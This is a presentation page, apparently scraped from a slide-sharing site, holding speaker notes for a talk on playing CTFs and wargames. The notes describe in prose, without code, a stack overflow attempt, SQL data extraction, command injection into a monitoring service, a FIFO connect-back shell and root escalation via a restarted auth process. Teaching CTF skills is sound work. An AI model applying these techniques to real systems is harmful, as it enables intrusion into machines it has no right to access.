Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Dernier (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Playing CTFs for Fun & Profit

Notes de l'éditeur

  1. Version 1.2
  2. I’ve been playing CTFs for around 2 years now.
  3. Who has played a CTF before? How about wargames?
  4. Who here has played a CTF before? And how about wargames?
  5. Next to look at some wargames sites
  6. Pick a link
  7. The links show different images. Interesting.
  8. Trying to view page source
  9. Trying to view the admin directory. What files control basic authentication?
  10. I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
  11. This is the typical wargames experience.
  12. There are lots of wargames around – I have some specific recommendations at the end
  13. Often same kinds of challenges as wargames. Lots of exploitation!By “progressive” I mean that you can generally attempt any tasks rather than having to complete “easier” ones first.
  14. Challenge-based also called “jeopardy” style
  15. After this, let’s look at some CTF scoreboards
  16. From these values we can brute-force calculate the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness!Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
  17. So when we win, this code is reached. Can anyone see how we’d actually exploit this?
  18. Running on port 443, simple web interface.
  19. Enter whatever text you want, choose a “language”, hit submit
  20. Click to show random text highlighted.Recon shows that the “keys” are entered as pastes and then checked again later.
  21. Digging into how pastie works
  22. The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
  23. Ran mysql against my instance to figure out the query needed to get data out.
  24. And that’s the pastie service done 
  25. Where to start? Just browsing through piles of incomprehensible ruby.
  26. Let’s verify that this does what it looks like it does.No 250 response code, just closes the connection.
  27. So how to exploit? I want to get the keys out.
  28. It doesn't seem to respond to much
  29. I love binary exploitation. I used to think I was ok at it.
  30. What does it actually do?
  31. Who can name a dangerous C function?
  32. Classic SBO, surely this gives remote pre-auth code execution?
  33. Nope
  34. Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
  35. Memory map of auth process
  36. When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
  37. Now for my l33t exploit. Nope. Out of time.
  38. Apache, running on port 3000
  39. Found the ruby code being run. It looks like it monitors other services.
  40. It can also get hashes of files. Can anyone guess what the exploit is yet?
  41. It can also get hashes of files. Can anyone guess what the exploit is yet?
  42. Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
  43. Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
  44. We start a listener
  45. Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
  46. Last one changes them back to their home directory before each command.
  47. We’re hackers. Go root or go home.
  48. You've got a shell, now what?They've changed the password, so sudo doesn't work!What can we edit, configuration-wise?
  49. Auth runs as root. We can make something else run as root. How about our connect-back code?
  50. How do we go about making auth restart? Lame DoS. Root.
  51. Just give it a go. Try some wargames. You will get stuck. Persist!For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
  52. Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
  53. Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though 
  54. I like learning, I enjoy it. Some people like money.